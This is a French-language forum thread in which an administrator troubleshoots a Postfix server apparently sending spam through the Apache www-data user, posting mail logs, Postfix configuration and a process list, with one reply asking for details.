Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
845 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs
  Logiciels

  [postfix] Spam sans être open relay

 


 Mot :   Pseudo :  
 
 Page :   1  2
Page Précédente
Auteur Sujet :

[postfix] Spam sans être open relay

n°917954
Le Veilleu​r
Posté le 31-05-2007 à 09:52:29  profilanswer
 

Bonjour,
 
Depuis 3 jours, j'ai bcp de soucis avec mon serveur postfix qui tourne depuis des mois et des mois sans aucun soucis ni modification. Postfix se met à saturer mon serveur

Code :
  1. srvlinux01:/etc/spamassassin# uptime
  2. 09:46:29 up 12:58,  1 user,  load average: 4.73, 5.90, 6.26


 
Et ca monte souvent bcp plus haut. En quelques secondes mon fichier de log se rempli
 

Code :
  1. May 31 09:47:21 srvlinux01 postfix/qmgr[27237]: 9B55FC3B32: from=<www-data@leveilleur.net>, size=6116, nrcpt=1 (queue active)
  2. May 31 09:47:21 srvlinux01 postfix/qmgr[27237]: 3125CC45AA: removed
  3. May 31 09:47:21 srvlinux01 postfix/qmgr[27237]: 9DE6AC3D06: from=<www-data@leveilleur.net>, size=6112, nrcpt=1 (queue active)
  4. May 31 09:47:21 srvlinux01 postfix/smtp[28093]: connect to arcanjo.com[205.178.189.131]: Connection timed out (port 25)
  5. May 31 09:47:21 srvlinux01 postfix/cleanup[28029]: E6652BCC0B: message-id=<20070531074721.E6652BCC0B@leveilleur.net>
  6. May 31 09:47:21 srvlinux01 postfix/qmgr[27237]: 9C950D2955: from=<www-data@leveilleur.net>, size=6109, nrcpt=1 (queue active)
  7. May 31 09:47:21 srvlinux01 postfix/virtual[28016]: 4A02EBCE80: to=<www-data@leveilleur.net>, relay=virtual, delay=1183, delays=874/309/0/0.12, dsn=5.1.1, status=bounced (unknown user: "www-data@leveilleur.net" )
  8. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 9A531C443C: from=<www-data@leveilleur.net>, size=6113, nrcpt=1 (queue active)
  9. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 941F6C3CBD: from=<www-data@leveilleur.net>, size=6108, nrcpt=1 (queue active)
  10. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 4A02EBCE80: removed
  11. May 31 09:47:22 srvlinux01 postfix/bounce[28192]: 40BC5C4344: sender non-delivery notification: E6652BCC0B
  12. May 31 09:47:22 srvlinux01 postfix/smtp[28093]: 1B93ABC85F: to=<marcos@arcanjo.com>, relay=none, delay=33504, delays=32575/899/30/0, dsn=4.4.1, status=deferred (connect to arcanjo.com[205.178.189.131]: Connection timed out)
  13. May 31 09:47:22 srvlinux01 postfix/virtual[28017]: 8B741C348C: to=<www-data@leveilleur.net>, relay=virtual, delay=1183, delays=874/309/0/0.22, dsn=5.1.1, status=bounced (unknown user: "www-data@leveilleur.net" )
  14. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 934FA54762: from=<www-data@leveilleur.net>, size=2783, nrcpt=1 (queue active)
  15. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 40BC5C4344: removed
  16. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: E6652BCC0B: from=<>, size=8197, nrcpt=1 (queue active)
  17. May 31 09:47:22 srvlinux01 postfix/virtual[28061]: 0AD06BCEE7: to=<www-data@leveilleur.net>, relay=virtual, delay=1182, delays=873/309/0/0.27, dsn=5.1.1, status=bounced (unknown user: "www-data@leveilleur.net" )
  18. May 31 09:47:22 srvlinux01 postfix/smtp[27468]: 6113CC41F2: to=<roquevasto@itelefonica.com.br>, relay=mx.terra.com.br[200.154.55.2]:25, delay=19262, delays=18288/773/121/81, dsn=2.0.0, status=sent (250 Ok: queued as 0AC842BCC04F)
  19. May 31 09:47:22 srvlinux01 postfix/smtp[28185]: connect to 201-39-72-1.tdf.com.br[201.39.72.1]: Connection timed out (port 25)
  20. May 31 09:47:22 srvlinux01 postfix/smtp[28044]: connect to arcanjo.com[205.178.189.131]: Connection timed out (port 25)
  21. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 9BDC7C39C7: from=<www-data@leveilleur.net>, size=6113, nrcpt=1 (queue active)
  22. May 31 09:47:22 srvlinux01 postfix/smtp[28092]: 3AA26BB93B: to=<morticia14@bol.com.br>, relay=mx.bol.com.br[200.221.29.128]:25, conn_use=7, delay=4189, delays=3270/919/0.2/0.46, dsn=5.0.0, status=bounced (host mx.bol.com.br[200.221.29.128] said: 554 <213.219.185.7.adsl.dyn.edpnet.net[213.219.185.7]>: Client host rejected: BOL-MX-BARREIRAMX-MS-12-986335 Try Again Later. See http://postmaster.uol.com.br/ for details (in reply to RCPT TO command))
  23. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 6113CC41F2: removed
  24. May 31 09:47:22 srvlinux01 postfix/smtp[28060]: 17BB0C3007: to=<notwen@super.com.br>, relay=mail3.netpar.com.br[200.103.225.17]:25, delay=26695, delays=25769/915/0.81/11, dsn=4.0.0, status=deferred (host mail3.netpar.com.br[200.103.225.17] said: 454 Servico indisponivel - Client host: O provedor [leveilleur.net -  213.219.185.7] foi bloqueado por estar listado na lista negra internacional [dnsbl.sorbs.net] por envio de SPAM ; Dynamic IP Addresses See: http://www.sorbs.net/lookup.shtml?213.219.185.7 (in reply to RCPT TO command))
  25. May 31 09:47:22 srvlinux01 postfix/virtual[28069]: 2CF78C365D: to=<www-data@leveilleur.net>, relay=virtual, delay=1182, delays=873/309/0/0.14, dsn=5.1.1, status=bounced (unknown user: "www-data@leveilleur.net" )
  26. May 31 09:47:22 srvlinux01 postfix/smtp[28200]: 160AABC9C2: to=<celinamartins@bol.com.br>, relay=mx.bol.com.br[200.221.29.128]:25, conn_use=3, delay=4189, delays=3269/919/0.19/0.41, dsn=5.0.0, status=bounced (host mx.bol.com.br[200.221.29.128] said: 554 <213.219.185.7.adsl.dyn.edpnet.net[213.219.185.7]>: Client host rejected: BOL-MX-BARREIRAMX-MS-12-986335 Try Again Later. See http://postmaster.uol.com.br/ for details (in reply to RCPT TO command))
  27. May 31 09:47:22 srvlinux01 postfix/smtp[28044]: 1C90954FB6: to=<guga@arcanjo.com>, relay=none, delay=33504, delays=32575/899/30/0, dsn=4.4.1, status=deferred (connect to arcanjo.com[205.178.189.131]: Connection timed out)
  28. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 96EA9C3DDA: from=<www-data@leveilleur.net>, size=6113, nrcpt=1 (queue active)
  29. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 8B741C348C: removed
  30. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 0AD06BCEE7: removed
  31. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 9EC55C44CF: from=<www-data@leveilleur.net>, size=6109, nrcpt=1 (queue active)
  32. May 31 09:47:22 srvlinux01 postfix/virtual[28059]: 2D37CC37E8: to=<www-data@leveilleur.net>, relay=virtual, delay=1183, delays=873/309/0/0.06, dsn=5.1.1, status=bounced (unknown user: "www-data@leveilleur.net" )
  33. May 31 09:47:22 srvlinux01 postfix/cleanup[28086]: ADDFA54159: message-id=<20070531074722.ADDFA54159@leveilleur.net>
  34. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 9EC55C44CF: to=<acfrota@zaz.com.br>, relay=none, delay=15235, delays=15235/0.1/0/0, dsn=4.0.0, status=deferred (delivery temporarily suspended: host mx-psi02.terra.com.br[200.176.10.240] refused to talk to me: 450 rejected: Too much dconnections from 213.219.185.7.adsl.dyn.edpnet.net[213.219.185.7])
  35. May 31 09:47:22 srvlinux01 postfix/qmgr[27237]: 2CF78C365D: removed


 
Le demain de  mon serveur email est @leveilleur.net mais l'adresse www-data@leveilleur.net n'existe pas. De plus, on voit bcp de mail du domaine .com.br
 
Alors là, je n'arrive pas à dire si c'est moi qui spam ou si c'est du spam que je recois :s Pourtant d'après tous les tests trouvés sur internet, je ne suis pas en open relay.
 
Merci


---------------
Mon Blog : LeVeilleur.net | Hébergement d'images : Hostipics.net
mood
Publicité
Posté le 31-05-2007 à 09:52:29  profilanswer
 

n°917957
toniotonio
Posté le 31-05-2007 à 09:58:43  profilanswer
 

faudrait voir ton postconf -n, ton master.cf et les processes qui tournent
 
egalement le type de machine: CPU, RAM, Disque
 
 
 
www-data est le user d'apache: as tu un script qui enverrait des mails ?

Message cité 1 fois
Message édité par toniotonio le 31-05-2007 à 09:59:52

---------------
Messagerie dédiée, Relais Mail Antispam/Antivirus, Infogérance 24/7: http://www.eole-its.com
n°917959
Le Veilleu​r
Posté le 31-05-2007 à 10:12:29  profilanswer
 

toniotonio a écrit :

faudrait voir ton postconf -n, ton master.cf et les processes qui tournent

 

egalement le type de machine: CPU, RAM, Disque

  

www-data est le user d'apache: as tu un script qui enverrait des mails ?


Code :
  1. srvlinux01:/etc/php5/apache2# postconf -n
  2. append_dot_mydomain = yes
  3. biff = no
  4. config_directory = /etc/postfix
  5. disable_vrfy_command = yes
  6. inet_interfaces = all
  7. mydestination = localhost, localhost.localdomain
  8. mydomain = leveilleur.net
  9. myhostname = leveilleur.net
  10. mynetworks = 127.0.0.0/8 192.168.1.0/24 192.168.10.0/24
  11. relayhost =
  12. smtpd_banner = $myhostname ESMTP (Debian/GNU)
  13. smtpd_client_restrictions = reject_unknown_client,        permit_mynetworks
  14. smtpd_helo_required = yes
  15. smtpd_recipient_restrictions = permit_mynetworks,        reject_unauth_destination,        reject_unknown_recipient_domain,        reject_non_fqdn_recipient
  16. smtpd_sender_restrictions = permit_mynetworks,        reject_unknown_sender_domain,     warn_if_reject reject_unverified_sender
  17. virtual_alias_maps = mysql:/etc/postfix/mysql-virtual_aliases.cf,mysql:/etc/postfix/mysql-virtual_aliases_mailbox.cf
  18. virtual_gid_maps = static:5000
  19. virtual_mailbox_base = /var/spool/vmail/
  20. virtual_mailbox_domains = mysql:/etc/postfix/mysql-virtual_domains.cf
  21. virtual_mailbox_maps = mysql:/etc/postfix/mysql-virtual_mailboxes.cf
  22. virtual_uid_maps = static:5000
  23. srvlinux01:/etc/php5/apache2#
 
Code :
  1. #
  2. # Postfix master process configuration file.  For details on the format
  3. # of the file, see the master(5) manual page (command: "man 5 master" ).
  4. #
  5. # ==========================================================================
  6. # service type  private unpriv  chroot  wakeup  maxproc command + args
  7. #               (yes)   (yes)   (yes)   (never) (100)
  8. # ==========================================================================
  9. smtp      inet  n       -       -       -       -       smtpd -o content_filter=spamassassin
  10. #submission inet n       -       -       -       -       smtpd
  11. #  -o smtpd_enforce_tls=yes
  12. #  -o smtpd_sasl_auth_enable=yes
  13. #  -o smtpd_client_restrictions=permit_sasl_authenticated,reject
  14. #smtps     inet  n       -       -       -       -       smtpd
  15. #  -o smtpd_tls_wrappermode=yes
  16. #  -o smtpd_sasl_auth_enable=yes
  17. #  -o smtpd_client_restrictions=permit_sasl_authenticated,reject
  18. #628      inet  n       -       -       -       -       qmqpd
  19. pickup    fifo  n       -       -       60      1       pickup
  20. cleanup   unix  n       -       -       -       0       cleanup
  21. qmgr      fifo  n       -       n       300     1       qmgr
  22. #qmgr     fifo  n       -       -       300     1       oqmgr
  23. tlsmgr    unix  -       -       -       1000?   1       tlsmgr
  24. rewrite   unix  -       -       -       -       -       trivial-rewrite
  25. bounce    unix  -       -       -       -       0       bounce
  26. defer     unix  -       -       -       -       0       bounce
  27. trace     unix  -       -       -       -       0       bounce
  28. verify    unix  -       -       -       -       1       verify
  29. flush     unix  n       -       -       1000?   0       flush
  30. proxymap  unix  -       -       n       -       -       proxymap
  31. smtp      unix  -       -       -       -       -       smtp
  32. # When relaying mail as backup MX, disable fallback_relay to avoid MX loops
  33. relay     unix  -       -       -       -       -       smtp
  34. -o fallback_relay=
  35. #       -o smtp_helo_timeout=5 -o smtp_connect_timeout=5
  36. showq     unix  n       -       -       -       -       showq
  37. error     unix  -       -       -       -       -       error
  38. discard   unix  -       -       -       -       -       discard
  39. local     unix  -       n       n       -       -       local
  40. virtual   unix  -       n       n       -       -       virtual
  41. lmtp      unix  -       -       -       -       -       lmtp
  42. anvil     unix  -       -       -       -       1       anvil
  43. scache   unix - - - - 1 scache
  44. #
  45. # ====================================================================
  46. # Interfaces to non-Postfix software. Be sure to examine the manual
  47. # pages of the non-Postfix software to find out what options it wants.
  48. #
  49. # Many of the following services use the Postfix pipe(8) delivery
  50. # agent.  See the pipe(8) man page for information about ${recipient}
  51. # and other message envelope options.
  52. # ====================================================================
  53. #
  54. # maildrop. See the Postfix MAILDROP_README file for details.
  55. # Also specify in main.cf: maildrop_destination_recipient_limit=1
  56. #
  57. maildrop  unix  -       n       n       -       -       pipe
  58.   flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
  59. #
  60. # See the Postfix UUCP_README file for configuration details.
  61. #
  62. uucp      unix  -       n       n       -       -       pipe
  63.   flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
  64. #
  65. # Other external delivery methods.
  66. #
  67. ifmail    unix  -       n       n       -       -       pipe
  68.   flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
  69. bsmtp     unix  -       n       n       -       -       pipe
  70.   flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
  71. scalemail-backend unix - n n - 2 pipe
  72.   flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
  73. mailman   unix  -       n       n       -       -       pipe
  74.   flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
  75.   ${nexthop} ${user}
  76. spamassassin unix -     n       n       -       -       pipe
  77.         user=spamd argv=/usr/bin/spamc -f -e   
  78.         /usr/sbin/sendmail -oi -f ${sender} ${recipient}
 
Code :
  1. USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
  2. root         1  0.0  0.3   1864   472 ?        S    May30   0:01 init [2]             
  3. root         2  0.0  0.0      0     0 ?        SN   May30   0:00 [ksoftirqd/0]
  4. root         3  0.0  0.0      0     0 ?        S<   May30   0:01 [events/0]
  5. root         4  0.0  0.0      0     0 ?        S<   May30   0:00 [khelper]
  6. root         5  0.0  0.0      0     0 ?        S<   May30   0:00 [kacpid]
  7. root        38  1.6  0.0      0     0 ?        S<   May30  13:18 [kblockd/0]
  8. root        51  0.0  0.0      0     0 ?        S<   May30   0:00 [aio/0]
  9. root        50  0.1  0.0      0     0 ?        S    May30   1:10 [kswapd0]
  10. root       193  0.0  0.0      0     0 ?        S    May30   0:00 [kseriod]
  11. root       214  0.0  0.0      0     0 ?        S    May30   0:00 [scsi_eh_0]
  12. root       221  0.0  0.0      0     0 ?        S    May30   0:00 [khubd]
  13. root       300  1.0  0.0      0     0 ?        S    May30   8:08 [kjournald]
  14. root       867  0.0  0.0      0     0 ?        S<   May30   0:00 [kmirrord/0]
  15. root      1295  0.0  0.0      0     0 ?        S    May30   0:00 [pciehpd_event]
  16. root      1315  0.0  0.0      0     0 ?        S    May30   0:00 [shpchpd_event]
  17. root      2257  0.3  0.4   1556   556 ?        Ss   May30   3:10 /sbin/syslogd
  18. root      2263  0.0  0.3   1500   384 ?        Ss   May30   0:00 /sbin/klogd -x
  19. bind      2275  0.0  7.8  39252 10028 ?        Ssl  May30   0:00 /usr/sbin/named -u bind
  20. root      2311  0.0  0.3   2596   488 ?        S    May30   0:00 /bin/sh /usr/bin/mysqld_safe
  21. mysql     2348  0.0 16.4 149420 20860 ?        Sl   May30   0:07 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
  22. root      2349  0.0  0.3   1480   412 ?        S    May30   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
  23. clamav    2483  0.0  0.6   5324   780 ?        Ss   May30   0:00 /usr/bin/freshclam -p /var/run/clamav/freshclam.pid -d --quiet
  24. root      2491  0.0  0.3   1668   392 ?        S    May30   0:00 /usr/sbin/courierlogger -pid=/var/run/courier/authdaemon/pid -start /usr/lib/courier/courier-authlib/authdaemond
  25. root      2492  0.0  0.3   4120   488 ?        S    May30   0:00 /usr/lib/courier/courier-authlib/authdaemond
  26. root      2501  0.0  0.2   1672   336 ?        S    May30   0:00 /usr/sbin/courierlogger -pid=/var/run/courier/imapd.pid -start -name=imapd /usr/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 143 /usr/lib/courier/courier/imaplogin /usr/bin/imapd Maildir
  27. root      2502  0.0  0.3   1772   392 ?        S    May30   0:00 /usr/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 143 /usr/lib/courier/courier/imaplogin /usr/bin/imapd Maildir
  28. root      2507  0.0  0.3   1772   476 ?        S    May30   0:00 /usr/sbin/couriertcpd -pid=/var/run/courier/pop3d.pid -stderrlogger=/usr/sbin/courierlogger -maxprocs=40 -maxperip=4 -nodnslookup -noidentlookup -address=0 110 /usr/lib/courier/courier/courierpop3login /usr/lib/courier/courier/courierpop3d Maildir
  29. root      2510  0.0  0.3   1668   436 ?        S    May30   0:00 /usr/sbin/courierlogger courierpop3login
  30. root      2511  0.0  0.5   4164   684 ?        S    May30   0:00 /usr/lib/courier/courier-authlib/authdaemond
  31. root      2512  0.0  0.7   4164  1008 ?        S    May30   0:00 /usr/lib/courier/courier-authlib/authdaemond
  32. root      2513  0.0  0.7   4164  1004 ?        S    May30   0:00 /usr/lib/courier/courier-authlib/authdaemond
  33. root      2514  0.0  0.5   4164   672 ?        S    May30   0:00 /usr/lib/courier/courier-authlib/authdaemond
  34. root      2515  0.0  0.5   4164   692 ?        S    May30   0:00 /usr/lib/courier/courier-authlib/authdaemond
  35. dcc       2520  0.0  0.4  26348   528 ?        Ssl  May30   0:01 /usr/sbin/dccifd
  36. root      2604  0.0  0.7   5808   948 ?        Ss   May30   0:01 /usr/sbin/nmbd -D
  37. root      2606  0.0  0.5   8984   640 ?        Ss   May30   0:00 /usr/sbin/smbd -D
  38. root      2615  0.0  0.5   8984   636 ?        S    May30   0:00 /usr/sbin/smbd -D
  39. snmp      2617  0.0  1.2   6796  1632 ?        S    May30   0:06 /usr/sbin/snmpd -Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1
  40. root      2623  0.0  0.5   4848   724 ?        Ss   May30   0:00 /usr/sbin/sshd
  41. daemon    2674  0.0  0.4   1744   512 ?        Ss   May30   0:00 /usr/sbin/atd
  42. root      2681  0.0  0.4   2132   632 ?        Ss   May30   0:01 /usr/sbin/cron
  43. root      2696  0.0  0.8  23556  1056 ?        Ss   May30   0:02 /usr/sbin/apache2 -k start
  44. root      2705  0.0  1.7   9300  2260 ?        S    May30   0:02 /usr/sbin/smbd -D
  45. root      2732  0.0  0.2   1492   372 tty1     Ss+  May30   0:00 /sbin/getty 38400 tty1
  46. root      2738  0.0  0.2   1492   372 tty2     Ss+  May30   0:00 /sbin/getty 38400 tty2
  47. root      2739  0.0  0.2   1492   372 tty3     Ss+  May30   0:00 /sbin/getty 38400 tty3
  48. root      2740  0.0  0.2   1492   372 tty4     Ss+  May30   0:00 /sbin/getty 38400 tty4
  49. root      2741  0.0  0.2   1492   372 tty5     Ss+  May30   0:00 /sbin/getty 38400 tty5
  50. root      2749  0.0  0.2   1492   372 tty6     Ss+  May30   0:00 /sbin/getty 38400 tty6
  51. www-data  5698  0.1  2.7  24468  3556 ?        S    08:00   0:09 /usr/sbin/apache2 -k start
  52. root      5719  0.4  1.0   7792  1336 ?        Ss   08:00   0:35 sshd: root@pts/0
  53. root      5724  0.0  0.9   3428  1244 pts/0    Ss   08:00   0:02 -bash
  54. root     16170  0.0  2.0  31012  2600 ?        Ss   08:42   0:02 /usr/sbin/spamd --create-prefs --max-children 5 --username spamd --helper-home-dir /var/lib/spamassassin/ -s /var/lib/spamassassin/spamd.log -d --pidfile=/var/lib/spamassassin/spamd.pid
  55. spamd    16262  0.0 15.9  34004 20316 ?        S    08:42   0:04 spamd child
  56. spamd    16263  0.0  1.4  31012  1780 ?        S    08:42   0:00 spamd child
  57. root     27234  1.0  1.0   4736  1368 ?        Ss   09:18   0:31 /usr/lib/postfix/master
  58. postfix  27236  0.0  1.0   4744  1380 ?        S    09:18   0:00 pickup -l -t fifo -u -c
  59. postfix  27237  2.5  3.7   8356  4752 ?        D    09:18   1:15 qmgr -l -t fifo -u
  60. postfix  27241  1.0  1.4   7348  1900 ?        S    09:18   0:30 trivial-rewrite -n rewrite -t unix -u -c
  61. postfix  27253  0.2  1.1   4908  1524 ?        S    09:18   0:07 scache -l -t unix -u -c
  62. postfix  27353  0.0  1.0   4744  1388 ?        S    09:18   0:00 anvil -l -t unix -u -c
  63. postfix  27493  0.0  1.0   4744  1380 ?        Ss   09:22   0:00 verify -l -t unix -u -c
  64. www-data 27504  0.0  4.3  23928  5480 ?        S    09:23   0:01 /usr/sbin/apache2 -k start
  65. www-data 27855  0.0  4.2  23856  5388 ?        S    09:36   0:00 /usr/sbin/apache2 -k start
  66. www-data 27856  0.0  4.0  23836  5136 ?        S    09:36   0:00 /usr/sbin/apache2 -k start
  67. postfix  28388  0.0  1.3   4880  1720 ?        S    09:52   0:00 smtp -t unix -u -c
  68. www-data 28404  0.0  3.5  23848  4480 ?        S    09:52   0:00 /usr/sbin/apache2 -k start
  69. root     28478  0.0  0.0      0     0 ?        S    09:55   0:00 [pdflush]
  70. postfix  28500  0.0  1.3   4880  1680 ?        S    09:55   0:00 smtp -t unix -u -c
  71. www-data 28531  0.0  4.6  23852  5860 ?        S    09:56   0:00 /usr/sbin/apache2 -k start
  72. www-data 28542  0.0  4.6  23864  5856 ?        S    09:56   0:00 /usr/sbin/apache2 -k start
  73. postfix  28570  0.0  2.0   7312  2660 ?        S    09:57   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
  74. postfix  28641  0.0  1.3   4880  1764 ?        S    10:00   0:00 smtp -t unix -u -c
  75. postfix  28652  0.0  1.4   4880  1824 ?        S    10:00   0:00 smtp -t unix -u -c
  76. postfix  28686  0.0  1.4   4880  1856 ?        S    10:00   0:00 smtp -t unix -u -c
  77. postfix  28705  0.0  1.3   4880  1704 ?        S    10:01   0:00 smtp -t unix -u -c
  78. postfix  28713  0.0  1.3   4880  1684 ?        S    10:01   0:00 smtp -t unix -u -c
  79. postfix  28714  0.0  1.4   4880  1812 ?        S    10:01   0:00 smtp -t unix -u -c
  80. postfix  28715  0.0  1.4   4880  1784 ?        S    10:01   0:00 smtp -t unix -u -c
  81. postfix  28716  0.0  1.4   4880  1828 ?        S    10:01   0:00 smtp -t unix -u -c
  82. postfix  28717  0.0  1.4   4880  1792 ?        S    10:01   0:00 smtp -t unix -u -c
  83. postfix  28722  0.0  1.1   4748  1520 ?        S    10:02   0:00 pipe -n spamassassin -t unix user=spamd argv=/usr/bin/spamc -f -e /usr/sbin/sendmail -oi -f ${sender} ${recipient}
  84. www-data 28724  0.0  1.7  23688  2212 ?        S    10:03   0:00 /usr/sbin/apache2 -k start
  85. www-data 28725  0.0  1.7  23688  2212 ?        S    10:03   0:00 /usr/sbin/apache2 -k start
  86. root     28728  0.0  0.0      0     0 ?        S    10:04   0:00 [pdflush]
  87. postfix  28732  0.1  1.9   7272  2540 ?        S    10:04   0:00 cleanup -z -t unix -u -c
  88. postfix  28733  0.0  1.9   7212  2464 ?        S    10:04   0:00 virtual -t unix
  89. postfix  28743  0.1  2.4   7444  3072 ?        S    10:05   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
  90. postfix  28744  0.0  1.2   4744  1572 ?        S    10:05   0:00 proxymap -t unix -u
  91. postfix  28749  0.1  2.1   7312  2680 ?        S    10:05   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
  92. postfix  28774  0.2  1.2   4772  1608 ?        S    10:05   0:00 bounce -z -n defer -t unix -u -c
  93. postfix  28798  0.1  1.4   4880  1840 ?        S    10:05   0:00 smtp -t unix -u -c
  94. postfix  28799  0.1  1.4   4880  1860 ?        S    10:05   0:00 smtp -t unix -u -c
  95. postfix  28800  0.2  1.2   4772  1608 ?        S    10:05   0:00 bounce -z -n defer -t unix -u -c
  96. postfix  28801  0.2  1.2   4772  1608 ?        S    10:05   0:00 bounce -z -n defer -t unix -u -c
  97. www-data 28802  0.0  1.2  23556  1616 ?        S    10:05   0:00 /usr/sbin/apache2 -k start
  98. postfix  28803  0.1  1.4   4880  1868 ?        S    10:05   0:00 smtp -t unix -u -c
  99. postfix  28804  0.2  1.4   4880  1868 ?        S    10:05   0:00 smtp -t unix -u -c
  100. postfix  28805  0.1  1.4   4880  1872 ?        S    10:06   0:00 smtp -t unix -u -c
  101. postfix  28806  0.1  1.4   4880  1868 ?        S    10:06   0:00 smtp -t unix -u -c
  102. postfix  28807  0.1  1.4   4880  1868 ?        S    10:06   0:00 smtp -t unix -u -c
  103. postfix  28808  0.2  1.4   4880  1868 ?        S    10:06   0:00 smtp -t unix -u -c
  104. postfix  28809  0.1  1.4   4880  1848 ?        S    10:06   0:00 smtp -t unix -u -c
  105. postfix  28810  0.1  1.4   4880  1860 ?        S    10:06   0:00 smtp -t unix -u -c
  106. postfix  28811  0.1  1.2   4772  1608 ?        S    10:06   0:00 bounce -z -n defer -t unix -u -c
  107. postfix  28812  0.0  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  108. postfix  28813  0.2  1.4   4880  1864 ?        S    10:06   0:00 smtp -t unix -u -c
  109. postfix  28814  0.0  1.4   4880  1836 ?        S    10:06   0:00 smtp -t unix -u -c
  110. postfix  28815  0.1  1.4   4880  1864 ?        S    10:06   0:00 smtp -t unix -u -c
  111. postfix  28816  0.1  1.4   4880  1840 ?        S    10:06   0:00 smtp -t unix -u -c
  112. postfix  28817  0.2  1.4   4880  1840 ?        S    10:06   0:00 smtp -t unix -u -c
  113. postfix  28819  0.1  1.4   4880  1848 ?        S    10:06   0:00 smtp -t unix -u -c
  114. postfix  28820  0.1  1.4   4880  1840 ?        S    10:06   0:00 smtp -t unix -u -c
  115. postfix  28821  0.0  1.4   4880  1840 ?        S    10:06   0:00 smtp -t unix -u -c
  116. postfix  28822  0.0  1.3   4880  1728 ?        S    10:06   0:00 smtp -t unix -u -c
  117. postfix  28823  0.0  1.4   4880  1808 ?        S    10:06   0:00 smtp -t unix -u -c
  118. postfix  28824  0.0  1.3   4880  1756 ?        S    10:06   0:00 smtp -t unix -u -c
  119. postfix  28825  0.1  1.4   4880  1848 ?        S    10:06   0:00 smtp -t unix -u -c
  120. postfix  28826  0.0  1.4   4880  1852 ?        S    10:06   0:00 smtp -t unix -u -c
  121. postfix  28827  0.1  1.4   4880  1848 ?        S    10:06   0:00 smtp -t unix -u -c
  122. postfix  28828  0.2  1.4   4880  1844 ?        S    10:06   0:00 smtp -t unix -u -c
  123. postfix  28829  0.1  1.4   4880  1840 ?        S    10:06   0:00 smtp -t unix -u -c
  124. postfix  28830  0.2  1.4   4880  1844 ?        S    10:06   0:00 smtp -t unix -u -c
  125. postfix  28831  0.0  1.4   4880  1812 ?        S    10:06   0:00 smtp -t unix -u -c
  126. postfix  28832  0.1  1.4   4880  1840 ?        S    10:06   0:00 smtp -t unix -u -c
  127. postfix  28833  0.1  1.2   4772  1608 ?        S    10:06   0:00 bounce -z -n defer -t unix -u -c
  128. postfix  28834  0.2  1.2   4772  1608 ?        S    10:06   0:00 bounce -z -n defer -t unix -u -c
  129. postfix  28835  0.2  1.2   4772  1608 ?        S    10:06   0:00 bounce -z -n defer -t unix -u -c
  130. postfix  28836  0.1  1.4   4880  1856 ?        S    10:06   0:00 smtp -t unix -u -c
  131. postfix  28837  0.3  1.4   4880  1868 ?        S    10:06   0:00 smtp -t unix -u -c
  132. postfix  28838  0.2  1.4   4880  1844 ?        S    10:06   0:00 smtp -t unix -u -c
  133. postfix  28839  0.1  1.4   4880  1860 ?        S    10:06   0:00 smtp -t unix -u -c
  134. postfix  28840  0.0  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  135. postfix  28841  0.2  1.4   4880  1856 ?        S    10:06   0:00 smtp -t unix -u -c
  136. postfix  28842  0.0  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  137. postfix  28843  0.0  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  138. postfix  28844  0.2  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  139. postfix  28846  0.1  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  140. postfix  28847  0.1  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  141. postfix  28848  0.6  1.4   4880  1848 ?        S    10:06   0:00 smtp -t unix -u -c
  142. postfix  28849  0.2  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  143. postfix  28850  0.2  1.4   4880  1820 ?        S    10:06   0:00 smtp -t unix -u -c
  144. postfix  28851  0.2  1.3   4772  1668 ?        S    10:06   0:00 bounce -z -t unix -u -c
  145. postfix  28852  0.3  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  146. postfix  28853  0.2  1.4   4880  1812 ?        S    10:06   0:00 smtp -t unix -u -c
  147. postfix  28854  0.7  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  148. postfix  28855  0.5  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
  149. postfix  28856  0.2  1.3   4880  1752 ?        S    10:06   0:00 smtp -t unix -u -c
  150. postfix  28857  0.5  1.4   4880  1780 ?        S    10:06   0:00 smtp -t unix -u -c
